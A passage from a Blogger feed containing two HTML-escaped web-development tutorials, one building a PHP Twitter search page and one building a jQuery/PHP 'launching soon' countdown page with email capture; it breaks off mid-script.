/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1. A little introduction&lt;/strong&gt;&lt;br /&gt;In this package you'll find two PHP file:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh3.ggpht.com/_TqPdHmAEwTM/SkaMX1RpZmI/AAAAAAAAEsk/YQB5lLMvezM/twwwe4.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;- &lt;em&gt;&lt;strong&gt;index.php&lt;/strong&gt;&lt;/em&gt;: the search page (search form + search results)&lt;br /&gt;- &lt;em&gt;&lt;strong&gt;search.php&lt;/strong&gt;&lt;/em&gt;: Twitter Search API for PHP&lt;br /&gt;&lt;br /&gt;You have to customize only &lt;em&gt;&lt;strong&gt;index.php&lt;/strong&gt;&lt;/em&gt; and your Twitter Search will be ready to be integrated into yor web projects in one minute!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2. Index.php&lt;/strong&gt;&lt;br /&gt;Take a look at &lt;em&gt;index.php&lt;/em&gt;. This page contains a simple search form:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form action&lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"index.php" &lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;method&lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"submit"&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;input name&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;="twitterq"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;type&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;="text"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"twitterq"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;input name&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;="Search"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;type&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;="submit"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;value&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;="Search"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...and some lines of PHP code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;&amp;lt;?php &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;include&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'search.php'&lt;/span&gt;);&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;if&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;$_GET&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'twitterq'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;]&lt;span style="color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;   $twitter_query &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;$_GET&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'twitterq'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;]&lt;/span&gt;;&lt;br /&gt;$search &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;new&lt;/span&gt; TwitterSearch&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$twitter_query&lt;span style="color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;$results&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $search&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;results&lt;span style="color: rgb(0, 0, 153);"&gt;()&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;foreach&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$results &lt;span style="color: rgb(0, 153, 0);"&gt;as&lt;/span&gt; $result&lt;span style="color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;           &lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;div class="twitter_status"&amp;gt;'&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;img src="'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;profile_image_url.&lt;span style="color: rgb(204, 0, 0);"&gt;'" class="twitter_image"&amp;gt;'&lt;/span&gt;;&lt;br /&gt;$text_n &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; toLink($result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;text);&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; $text_n;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;div class="twitter_small"&amp;gt;'&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;strong&amp;gt;From:&amp;lt;/strong&amp;gt; &amp;lt;a href="http://www.twitter.com/'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;from_user&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'"&amp;gt;'.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;from_user.&lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;/a&gt;: '&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;strong&amp;gt;at:&amp;lt;/strong&amp;gt; '&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;created_at;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt; '&amp;lt;/div&amp;gt;'&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;/div&amp;gt;'&lt;/span&gt;;&lt;/div&gt;   &lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;?&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;font-family:courier new;"&gt;$result &lt;/span&gt;is the array that contains search results. To display all elements of the array (search results) I used this simple loop:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;foreach&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$results &lt;span style="color: rgb(0, 153, 0);"&gt;as&lt;/span&gt; $result&lt;span style="color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;br /&gt;...&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;... and to get a specific attribute of the array I used this simple code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;name_of_element&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;The structure of a tweet contains the following attributes (take a look at the &lt;a href="http://apiwiki.twitter.com/"&gt;Twitter API home page&lt;/a&gt; for a full list):&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold;"&gt;[text]&lt;/span&gt;: Text of the current tweet&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt; [to_user_id]&lt;/span&gt;: User Id&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;    [from_user]&lt;/span&gt;: User name&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt; [id]&lt;/span&gt;: Tweet Id&lt;br /&gt;   &lt;span style="font-weight: bold;"&gt;[from_user_id]&lt;/span&gt;: User id&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt; [source]&lt;/span&gt;: Source of the current tweet&lt;br /&gt;  &lt;span style="font-weight: bold;"&gt; [profile_image_url]&lt;/span&gt;: User profile image URL&lt;br /&gt;   &lt;span style="font-weight: bold;"&gt;[created_at]&lt;/span&gt;: Date of the current tweet&lt;/div&gt;&lt;br /&gt;...so, if you want to display the text of a tweet you can use this code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 0);"&gt;text&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 0);"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;The following line of code get the text of the current tweet and convert a textual link into a clickable link:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;$text_n &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; toLink($result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;text);&lt;/div&gt;&lt;br /&gt;That's all! Now download the source code, open and upload all files in your test server, open &lt;span style="font-weight: bold;"&gt;index.php&lt;/span&gt; and try to search for something!&lt;br /&gt;If you have some suggestion, please add a comment!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/8h6usxihi2"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Related posts&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2009/06/super-simple-way-to-work-with-twitter.html"&gt;Super simple way to work with Twitter API (PHP + CSS)&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2007/10/twitter-send-message-from-php-page.html"&gt;Send messages from a PHP page using Twitter API&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-158978601546306521?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/158978601546306521/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=158978601546306521' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/158978601546306521'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/158978601546306521'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/simple-php-twitter-search-ready-to-use.html' title='Simple PHP Twitter Search ready to use in your web projects'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_TqPdHmAEwTM/SkZ-nDCE1xI/AAAAAAAAEsI/c1IGyxqI10I/s72-c/tweet1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6300420301875771550</id><published>2009-07-28T20:11:00.001-07:00</published><updated>2009-07-28T20:11:00.559-07:00</updated><title type='text'>How to implement a launching soon page with PHP and jQuery</title><content type='html'>In this tutorial I want to explain how to implement a simple &lt;em&gt;&lt;span style="font-weight: bold;"&gt;launching soon page&lt;/span&gt;&lt;/em&gt; using PHP and jQuery. What's a launching soon page? In general it's a page that informs the visitors of a website under construction about when the website is going to be online and allows them to leave their emails in order to be updated when the website is on-line. A typical launching soon page contains a countdown and a form that collects emails from interested visitors. In this tutorial I implemented a launching soon page like this:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/Skj68E0n1II/AAAAAAAAE0w/fzKp0pt9GxA/launchsoon2.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;Take a look at the &lt;a href="http://woorktuts.110mb.com/launchingsoonpage/"&gt;live preview here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;This page is very simple to modify and customize using just some lines of CSS code. You can also add the logo of your company and all elements you want with some lines of HTML code. &lt;a href="http://www.box.net/shared/i6fr5xqy79"&gt;Download the source code&lt;/a&gt; of this tutorial you can customize and reuse in your web project for free!&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/i6fr5xqy79"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;A little introduction&lt;/strong&gt;&lt;br /&gt;How I said this package is ready to use and contains these files:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh3.ggpht.com/_TqPdHmAEwTM/SkkS0-JWlmI/AAAAAAAAE08/iWOcaHH1_sk/launchsoon6.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;index.php&lt;/span&gt;&lt;/em&gt;: the launching soon page final interface (countdow + form)&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;config.php&lt;/span&gt;&lt;/em&gt;: enables database connection&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;insert.php&lt;/span&gt;&lt;/em&gt;: PHP code to add emails into a database table&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;js/jquery-1.3.2.min.js&lt;/span&gt;&lt;/em&gt;: jQuery framework&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;js/countdown.js&lt;/span&gt;&lt;/em&gt;: the countdown script&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1. index.php&lt;/strong&gt;&lt;br /&gt;index.php is the final interface of your launching soon page. How I said it contains a countdown and a form to allow users to leave their emails.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;The countdown script&lt;/strong&gt;&lt;br /&gt;In order to implement the countdown I used this &lt;a href="http://www.dynamicdrive.com/dynamicindex6/dhtmlcount.htm"&gt;dynamic countdown script&lt;/a&gt; that lets you count down to relative events of a future date/time. This future date, while the same for everyone, occurs differently depending on the time zone they're in. The result is here and it's fully customizable changing some lines of CSS code:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/SkkAcMyqi2I/AAAAAAAAE00/AQMLtH1geKc/launchsoon3.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The only thing you have to do is to add this line of code in the &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;head&amp;gt;&lt;/span&gt; tag of the page:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"js/countdown.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Then, in the tag &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;body&amp;gt;&lt;/span&gt; add the following lines of code to display the countdown:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"count_down_container"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; currentyear &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;new&lt;/span&gt; &lt;span style="color: rgb(51, 153, 153);"&gt;Date&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;().&lt;/span&gt;&lt;span style="color: rgb(51, 153, 153);"&gt;getFullYear&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;()&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; target_date &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;new&lt;/span&gt; cdtime&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"count_down_container", "&lt;span style="font-weight: bold;"&gt;July 6&lt;/span&gt;, "+&lt;/span&gt;currentyear&lt;span style="color: rgb(51, 102, 255);"&gt;+" 0:0:00"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;)&lt;/span&gt;&lt;br /&gt;target_date&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;.&lt;/span&gt;displaycountdown&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"days"&lt;/span&gt;, displayCountDown&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;To set a target date you have to change this line modifying &lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;July 6&lt;/span&gt; and the hour &lt;span style="color: rgb(51, 102, 255);"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;0:0:00 &lt;/span&gt;&lt;/span&gt;with your target date (for example 25 december)&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;&lt;/span&gt;&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;new&lt;/span&gt; cdtime&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"count_down_container", "&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;July 6&lt;/span&gt;, "+&lt;/span&gt;currentyear&lt;span style="color: rgb(51, 102, 255);"&gt;+" &lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;0:0:00&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;...if your target date is &lt;em&gt;&lt;span style="font-weight: bold;"&gt;25 December&lt;/span&gt;&lt;/em&gt; the previous line becomes:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;new&lt;/span&gt; cdtime&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"count_down_container", "&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;December 25&lt;/span&gt;, "+&lt;/span&gt;currentyear&lt;span style="color: rgb(51, 102, 255);"&gt;+" &lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;0:0:00&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;If you want to change the style of the countdown you have to modify the following CSS classes:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;.count_down{&lt;/span&gt;...&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;.count_down sup{&lt;/span&gt;...&lt;span style="color: rgb(204, 51, 204);"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;In particular &lt;span style="color: rgb(204, 51, 204);"&gt;.count_down{}&lt;/span&gt; changes the format of the numbers and &lt;span style="color: rgb(204, 51, 204);"&gt;.count_down sup{}&lt;/span&gt; changes the style of the text "days", "hours", "minutes".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;jQuery and the input form&lt;/strong&gt;&lt;br /&gt;Ok, the countdown is ready! Next step: add this line of code to include jQuery in the &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;head&amp;gt;&lt;/span&gt; tag of the page:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"js/jquery-1.3.2.min.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt; &amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Now, in the tag &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;body&amp;gt;&lt;/span&gt; add a simple form with an input field:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"submit_leave_email"&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt; &amp;lt;input id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"input_leave_email" &lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;class=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"input_bg" &lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;value=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"Add your e-mail address&lt;span style="color: rgb(255, 102, 0);"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt; &amp;lt;button type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"submit"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt; class=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"input_button"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;Update me&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/button&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;...and add this layer to display a custom message when an user submit the form:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"update_success"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;E-mail added!&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;/div&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...the result after the submission is here:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/SkkL_VRtNqI/AAAAAAAAE04/XcX13rmblSs/launchsoon4.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;The form with the input field disappears with a nice fade-out effect and a success message appears in its place. Now, in the&lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt; &amp;lt;head&amp;gt;&lt;/span&gt; tag, after the line of code that includes jQuery, add this script to enable ajax functionalities to insert emails added from users into a  database table without reload the page:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;$&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;document&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.ready&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;function&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(){&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt; $&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"form#submit_leave_email"&lt;/span&gt;).submit&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;function&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;() {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; input_leave_email &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'#input_leave_email'&lt;/span&gt;).attr&lt;span style="color: rgb(0, 0, 153); 